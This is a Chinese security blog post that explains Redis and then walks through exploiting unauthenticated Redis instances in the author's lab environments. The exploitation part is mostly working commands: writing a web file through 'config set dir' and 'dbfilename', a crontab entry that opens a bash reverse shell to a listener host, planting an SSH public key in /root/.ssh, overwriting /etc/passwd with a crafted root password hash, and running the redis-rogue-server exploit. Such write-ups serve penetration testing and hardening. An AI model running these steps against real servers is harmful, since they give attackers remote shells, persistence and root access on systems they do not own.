当前位置:首页 > Web安全 > 正文内容

Redis常见利用方法

UzJu2年前 (2022-05-05)Web安全919

Redis常见利用方法

08589235ab4009b7502207f98398a201.png

Redis简介与学习

Redis常见端口

  • 6379

Redis是现在最受欢迎的NoSQL数据库之一,Redis是一个使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数据库,其具备如下特性:

  • 基于内存运行,性能高效
  • 支持分布式,理论上可以无限扩展
  • key-value存储系统
  • 开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API

Redis数据结构
1cce61f86d076b72446e990c21a05f7f.png

Redis为什么快

  1. 完全基于内存操作
  2. C语言实现,优化过的数据结构,性能高
  3. 单线程,无切换上下文的成本
  4. 异步非阻塞IO(多路复用IO)

Redis在Linux和Windows下有区别吗

从多路复用IO来看

在Redis中很多地方调用Linux的epoll方法来实现多路复用,而在Windows系统是没有epoll方法的,Windows下对应的是IOCP模型,

从Redis如何进行持久化来看

  1. RDB 快照,内存数据的二进制序列化文件
  2. AOF 日志,修改内存数据的指令记录文本

RDB持久化的手动备份命令是bgsave,AOF文件过大的重写命令是bgrewriteaof。

原理都是开辟一个子进程对内存进行处理(注意了是子进程,不是子线程),这就涉及到操作系统的机制了。

Redis通过Linux系统的fork函数创建子进程,共享内存里面的代码段和数据段,从而实现了持久化。

然而Windows系统是没有fork函数的。

环境搭建

Docker

这里使用docker快速启动Redis

docker search redis

638758d0cefeaf54ccc05ae6d4d3095e.png

docker pull redis

9a2257afde6cc9b4e8291498889d44de.png

启动容器

docker run -itd run -p 6379:6379 -d redis

fa59893a60fba588ba189b1052195daa.png

手动安装

wget http://download.redis.io/releases/redis-3.2.11.tar.gz
tar -zxvf redis-3.2.11.tar.gz
vim redis.conf
make

protected-mode的yes修改为No
7ae078ba64863b8e1c8a91cf2150d134.png

注释 bind 127.0.0.1
b3bc99f3c15bae47b7cbfa46bc34422e.png

cp ./redis-server /usr/local/bin/

e367a456298a8bf4cc8e30b3a22f4afc.png

采坑

dc57a8446bc23a632aad4306a55f24dd.png

如果遇到这个,就用make编译,首先卸载原来的apt安装的版本

apt remove redis-server

然后make编译就可以了

Redis-cli下载

Windows

https://github.com/microsoftarchive/redis/releases

Linux

wget http://download.redis.io/redis-stable.tar.gz 
tar -xzvf redis-stable.tar.gz
cd redis-stable
make
cp src/redis-cli /usr/local/bin/

MacOs

brew tap ringohub/redis-cli
brew install redis-cli

Redis常见漏洞与利用方法

1、未授权利用

Redis 默认情况下,会绑定 .0.0.0.0:6379 ,如果没有才有相关的策略,比如添加防火墙规则避免其他非信任来源 限制ip访问等,那么就会将 Redis 服务暴露到公网上。如果没有设置密码认证的话(一般为空),会导致任意用户在可以访问目标服务器的情况下,未授权访问 Redis 以及 读取 Redis 的数据。

在未授权的情况下,可以利用 Redis 自身提供的 config 命令进行写入shell、写SSH公钥、创建计划任务反弹shell 等。其思路都是先将 Redis 的本地数据库存放目录设置为 特定的目录,然后将 dbfilename \(本地数据库文件名\) 设置为你想写入的文件名称,最后在执行 save 或 bgsave 保存,那么就看在制定的目录下写入指定的文件了。 
redis-cli -h ip //无需密码登录
redis-cli -h host -p port -a password   //使用redis密码登入redis服务
info

aaa06dd14b9194372ca77e397c92098d.png

首先先来看一下info中有哪些信息
37d4bd19971540d618e488f837de80aa.png

34823a54a4d004beced5c49bc60ab6a5.png

1、写WebShell

原理

在数据库中插入一条Webshell数据,将此Webshell的代码作为value,key值随意(x),然后通过修改数据库的默认路径为/www/wwwroot/html和默认的缓冲文件shell.php,把缓冲的数据保存在文件里,这样就可以在服务器端的/www/wwwroot/html下生成一个Webshell

条件

1、redis和网站要在同一台服务器下

2、知道网站根目录的绝对路径

2、运行redis服务的用户必须有权限向目录写文件

利用方法

将dir设置为/www/wwwroot/html,将指定本地数据库存放目录设置为/www/wwwroot/html;将dbfilename设置为文件名shell.php,即指定本地数据库文件名为shell.php;再执行save或bgsave,则我们就可以写入一个路径为/www/wwwroot/html/shell.php的Webshell文件

首先我们在服务器的根目录中创建一个/www/root的文件夹并用python启动一个临时的HTTP服务
af1475d9f1f103e910620aa2fc2d9fa8.png

272537a2f42c31afc64789867dedab50.png

获取当前路径

Config get dir

6b1e3f33c6f02d3a8127bda015208f1b.png

设置/www/root为指定目录

Config set dir 

fbc64a7b04e544861cdde6baa97f5340.png

写入文件

Set abc "\n\n<?php phpinfo();?>" //写入,这里还有一种写法:set abc”\n\n<xxx>”nx,末尾的nx代表仅当键abc不存在的时候,才会创建。这样可以防止误更新到业务在用的键名,引发业务的异常。

0d969ddf3638f496a2f2b455c1894a04.png

设置写文件

Config set dbfilename test.php

84bc3d0f5211628c701d0d619c2303c3.png

随后尝试访问
64d624bb049006cbbf9030cde63fa833.png

这里是肯定不会解析的,因为只是一个HTTP服务,可以看到目录下也有test.php,成功写入
1033763cb9e30316eb42790a1078fecc.png

ps: 来自Tatsumaki大佬的博客

2、写Crontab

条件

  • 访问目标服务器的redis不需要密码
  • redis对/var/spool/cron有写入权限

Ubuntu

Config set dir /var/spool/cron
set abcd "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.0.13/1234 0>&1\n\n"
Config set filename root
Save

29692b5557d111b1eec89f07d1fb1f1d.png

b1e591a3868475ba6d60ba306391ca92.png

在Ubuntu中尝试之后,发现并没有反弹shell回来,不知道为什么,查询了文章看到有大佬说

这个方法只能在Centos上使用,Ubuntu上是行不通的,原因如下:

因为默认redis写文件后是644的权限,但ubuntu要求执行定时任务文件/var/spool/cron/crontabs/<username>权限必须是600也就是-rw———-才会执行,否则会报错(root) INSECURE MODE (mode 0600 expected),而Centos的定时任务文件/var/spool/cron/<username>权限644也能执行

所以这里更换Centos尝试,搭建步骤与上文一致,发现centos确实在1分钟左右就返回了shell
829eec0c5f1b10bb4b0e61ef1e2d0049.png

按照上面CentOs和Ubuntu写文件的说法,可以来看一下写入的文件权限大小

Linux权限对应表
df829a15ae7a3bba86db528db9524304.png

3ea7002d30a08934d5044c54b9a6f343.png

可以看到CentOs中的是644
e31a42b4b0863c997a81011a5856843f.png

Ubuntu中也是644,那么如果真如那篇文章所说,必须是600才会执行的话,那么确实Ubuntu无法执行(

3、写SSH公钥

条件

  • Redis服务使用root启动
  • 服务器开启了SSH,但是允许密钥登录

这里就用Centos7搭建的redis作为环境

首先配置ssh密钥登录

vi /etc/ssh/sshd_config

RSAAuthentication yes # 开启密钥登入的认证方式

PubkeyAuthentication yes # 开启密钥登入的认证方式

PermitRootLogin yes # 此处请留意 root 用户能否通过 SSH 登录,默认为yes

# 可以正常用密钥登录了,再把这里改为no
PasswordAuthentication yes #当我们完成全部设置并以密钥方式登录成功后,可以禁用密码登录。这里我们先不禁用,先允许密码登陆

62b64f1e2b3777bee65fa638073bfdf1.png

然后重启sshd服务

systemctl restart sshd

随后尝试连接会提示
c0bf8661c2f54e3b0fc9dd79993555b2.png

随后在Mac上生成密钥

ssh-keygen -t rsa

设置.ssh目录

Config set dir /root/.ssh/

写入公钥

(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > /root/.ssh/key.txt
cat /root/.ssh/key.txt | redis-cli -h 192.168.0.148 -x set xxx

# Mac
(echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") > ./key.txt
cat /root/.ssh/key.txt | redis-cli -h 192.168.0.148 -x set xxx

8cd7c5fdb6fd92634bfb8f8e7b126930.png

随后就可以使用shh直接连接了
e30c2cd9ed76c300db3bc6aa4451fd32.png

4、重置Linux账户密码

原理

若/etc/passwd和/etc/shadow中同时存在密码,系统会使用/etc/passwd中的密码进行验证 /etc/passwd-是/etc/passwd的备份,成功登录系统后,通过替换/etc/passwd-文件,可以恢复root用户的原密码

Linux存账户密码一般会有/etc/passwd和/etc/shadow,如果两个出现冲突的话,会以/etc/passwd为准。

另外,/etc/passwd的权限一般是644,比/etc/shadow的640要高。而且,redis写入是覆盖的,也就是说,写入进去覆盖之后,其他的都没了,这个过程是有创且不可逆的。

这里用到一个大佬的dockerfile: https://github.com/justonly1/DockerRedis

或者docker直接下载也可以

docker pull ju5ton1y/redis:latest
docker run -itd -p 6379:6379 -p 6378:22 ju5ton1y/redis:latest
# 启动之后需要进入容器
/etc/init.d/ssh restart

8c0cc21bca1ca8576346b1f97179f335.png

b975fbdc60254eba78f10d31a58404ff.png

随后生成一串密码为YourNewPasswd%1024的密文

另外这段代码

python -c 'import crypt; print crypt.crypt("YourNewPasswd%1024","$6$my0salt0")'

mac下会这样
a35d15e21877f46dded9b9303d4ad4dd.png

在kali下就好了
eafff4d578885f1f23347729955d9eea.png

然后写入/etc/passwd

SET abcd "\n\n root:$6$my0salt0$yCCi..OsWo8n5MaBFytGaZ0qTcHErSaoyvAVvMXFEnwgMOtpm6sYbtwUR4I.GA7Kt0X0KruYifS6c9.FkDN53.:0:0:root:/root:/bin/bash\nsshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin\n\n"
config set dbfilename passwd
save

然后就可以使用YourNewPasswd%1024这个密码登录了
3ecd53aa41b8f3d08cf67e75165af515.png

2、主从备份

这里用vulhub的靶场

git clone https://github.com/vulhub/vulhub.git
cd redis/4-unacc/
docker-compose up -d

da717cd0c076c9d146f2c7910ad5a60e.png

c4386984ffcb3c010408d4e2eb90ee3d.png

exp用这个https://github.com/n0b0dyCN/redis\-rogue\-server.git

git clone https://github.com/n0b0dyCN/redis-rogue-server.git
python3 redis-rogue-server.py --rhost 192.168.0.13 --lhost 192.168.0.139
# rhost是redis,lhost是kali

这执行的时候会遇到错误
49b76596a0ffde61e70c7e5ce4afb020.png

4b42cd5655b94ad27ec9cbff9b88cb39.png

多跑几次就行
a96b81bcbad61ce257602b134d6961aa.png

参考

扫描二维码推送至手机访问。

版权声明:本文由UzJu的安全屋发布,如需转载请注明出处。

SQL ERROR: ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'

本文链接:https://uzzju.com/post/63.java

标签: REDIS
分享给朋友:

相关文章

从SQL注入延时盲注到Get Database

从SQL注入延时盲注到Get Database

从SQL注入延时盲注到Get Database一、IAST发现 执行的SQL语句 SELECT COUNT(1) FROM t_ad WHERE (a`openrasp = ? AND delete_flag = ? AND ad_...

【渗透测试】记一次智慧校园系统一轮游

【渗透测试】记一次智慧校园系统一轮游

记一次智慧校园系统一轮游记一次智慧校园系统一轮游一、前言如发现存在问题发送邮件到:UzJuer@163.com删除文章 关于如何挖逻辑漏洞的思维图 二、智慧校园系统1、www.xxx-xxxx.com svn泄露Ps:后...

某次授权渗透测试小记

某次授权渗透测试小记

某次授权渗透测试小记一、某次授权渗透测试部分小记本文已得到授权 如发现存在问题发送邮件到:UzJuer@163.com删除文章 1、帝国CMS 后台GETSHELL图书馆的一个系统,为开源CMS修改的,然后通过版本探测与其他的...

浅析:TomCat Getshell拿服务器权限实战

浅析:TomCat Getshell拿服务器权限实战˂a name="0xOO前言" class="reference-link" href="#"˃0xOO前言无意中接触到一个网站 所以索性尝试一下 没什么技术性 都是一些基本操作 大...

两个简单的前端加密逆向

两个简单的前端加密逆向

前言两个站点都是比较简单的前端加密,也都是朋友喊来练练手的,不过Trace这款工具还是不错的吧 推荐一下六边形战士的Github工具:https://github.com/CC11001100/ast-hook-for-js-RE...

Java-SQL注入

Java-SQL注入

1、JDBC1.1、Statement创建连接对象使用CreateStatement() Statement stmt = null; try { stmt = conn.createStatement( ); . ....

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。